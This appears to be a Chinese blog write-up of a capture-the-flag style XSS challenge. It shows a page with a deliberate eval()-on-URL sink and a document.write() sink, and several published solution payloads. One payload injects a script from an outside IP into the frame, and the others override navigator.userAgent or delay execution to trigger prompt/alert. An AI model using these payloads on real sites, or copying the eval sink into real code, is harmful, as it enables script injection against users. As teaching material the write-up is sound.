记一次xss挑战

2024-04-28 星期日 / 0 评论 / 0 点赞 / 2 阅读 / 6611 字

起始一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址: http://server.n0tr00t.com/n0js/case2.html标准:

起始

有一次看到一位大牛放出的一个 XSS 挑战页面，在 iframe 页面中执行 XSS 即算完成。
地址: http://server.n0tr00t.com/n0js/case2.html
标准: Please execute the jscode in the iframe(name=hi): prompt location.href
Work: Chrome, Firefox

case2.html

<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <title>n0js case2</title>
  </head>
  <body style="margin: -10px 0px 0px 10px;">
    <h1>[n0js] case2</h1>
    <span>Please execute the jscode in the iframe(name=hi): prompt location.href</span><br>
    <span>Work: Chrome, Firefox</span><br>
    <span>Datetime: 2016-12-14</span>
    <ul>
      <li>Submit: evi1m0.bat[at]gmail.com</li>
      <li>Casetip: dota2 pudge</li>
      <li>Subject by: evi1m0 / server.n0tr00t.com</li>
    </ul>
    <hr>
    <!-- Intentional DOM-XSS sink that the challenge is built around: the text after
         the first "=" in the query string is passed to eval() twice. The inner eval()
         turns the parameter into a value; the outer eval() then runs that value as
         code, so any query expression that evaluates to a string is executed in this
         page's origin. Note that this script runs before the iframe below has been
         parsed, so at this point window['hi'] does not exist yet.
         Mitigation for real code: never feed location-derived data to eval(), and
         deploy a Content-Security-Policy that does not allow 'unsafe-eval'. -->
    <script>
      eval(eval((window.location.search.substring(1).split("=")[1])));
    </script>
    <pre>
      <!-- The frame is served from the same host as this page, so it is same-origin
           and the parent can reach into it (window['hi'], its document, its eval). -->
      <iframe name="hi" src="//server.n0tr00t.com/n0js/case2_test.html" style="width: 400px;height: 200px;"></iframe>
    </pre>
  </body>
</html>

case2_test.html

<script>
  // Returns a coarse OS label derived from navigator.platform and, for Windows,
  // from the "Windows NT x.y" / product-name tokens of navigator.userAgent.
  // Possible return values: "Mac", "Unix", "Linux", "Win2000", "WinXP", "Win2003",
  // "WinVista", "Win7", or "other" when nothing matches.
  function getos() {
    var sUserAgent = navigator.userAgent;
    var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");
    var isMac = (navigator.platform == "Mac68K") || (navigator.platform == "MacPPC") || (navigator.platform == "Macintosh") || (navigator.platform == "MacIntel");
    if (isMac) return "Mac";
    // "X11" only counts as Unix when neither Windows nor Mac matched above.
    var isUnix = (navigator.platform == "X11") && !isWin && !isMac;
    if (isUnix) return "Unix";
    var isLinux = (String(navigator.platform).indexOf("Linux") > -1);
    if (isLinux) return "Linux";
    if (isWin) {
      var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;
      if (isWin2K) return "Win2000";
      var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;
      if (isWinXP) return "WinXP";
      var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;
      if (isWin2003) return "Win2003";
      var isWinVista= sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;
      if (isWinVista) return "WinVista";
      var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;
      if (isWin7) return "Win7";
    }
    return "other";
  }
  // DOM-XSS sink and the real target of the challenge: window.parent.navigator.userAgent
  // is read from the *parent* document and written into this frame's markup unescaped
  // via document.write(). Because the parent page (case2.html) passes its query string
  // to eval(), whoever controls the parent's URL can redefine navigator.userAgent (or
  // replace navigator itself) before this frame loads, and the value is then rendered
  // here as HTML.
  // Mitigation: insert such values with textContent / createTextNode instead of
  // document.write(), and treat anything read across a frame boundary as untrusted.
  document.write('OS:'+getos()+'<br>UA:'+window.parent.navigator.userAgent);
</script>

分析

1. case2.html 中的 js 取 url 地址“=”后面的值传入 eval 执行（eval 嵌套了两层）
2. 页面先加载 js，后加载 iframe
3. url 传入的参数带单引号、双引号都会被 urlencode
4. case2_test.html 提示 userAgent 或许可用
5. 开搞

解决

1. url 应该是 case2.html?test=payload
2. 使用延时执行 js；修改浏览器的 navigator.platform 属性；绑定监听页面 load 事件
3. url 地址“#”后面的单双引号等字符不会被编码，所以把 payload 放在 hash 里，query 中只传 location.hash.substr(1)：内层 eval 取出 hash 字符串，外层 eval 再把它当代码执行

case1: 延时加载js

解法一: case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca
解法二: case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)  // @fyth

case2: 修改浏览器属性

解法一: case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}})  //@gaoheby
解法二: case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '<svg/onload=prompt(location.href)>'}) // @fyth
解法三: case2.html?a=location.hash.substr(1)#var frame = document.createElement('iframe'); frame.style.display = 'none'; document.body.appendChild(frame); function navigator(){} window.navigator = new Proxy(window.frames[0].window.navigator, { get: function(n0t){return "<img src=@ onerror=alert(location.href)>";} })  // @evi1m0
解法四: case2.html?a=location.hash.substr(1)#function createProperty(value){var _value=value;function _get(){return _value}function _set(v){_value=v}return{"get":_get,"set":_set}}; function makePropertyWritable(objBase,objScopeName,propName,initValue){var newProp,initObj;if(objBase&&objScopeName in objBase&&propName in objBase[objScopeName]) {if(typeof initValue==="undefined"){initValue=objBase[objScopeName][propName]}newProp=createProperty(initValue);try{Object.defineProperty(objBase[objScopeName],propName,newProp)} catch(e){initObj={};initObj[propName]=newProp;try{objBase[objScopeName]=Object.create(objBase[objScopeName],initObj)}catch(e){}}}}; makePropertyWritable(window,"navigator","userAgent"); window.navigator.userAgent="<script>prompt(location.href)</script>"; // 1124696276

case3: 绑定监听页面load属性

case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})

最后

作者测试页面: http://server.n0tr00t.com/n0js/
上面几个解法都来自此页面，作者又放出了一个 case，欢迎感兴趣的去玩耍，多学习。
MDN 的 JavaScript 文档: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript
好好学习天天向上，thx piaca & NorthOrchid。

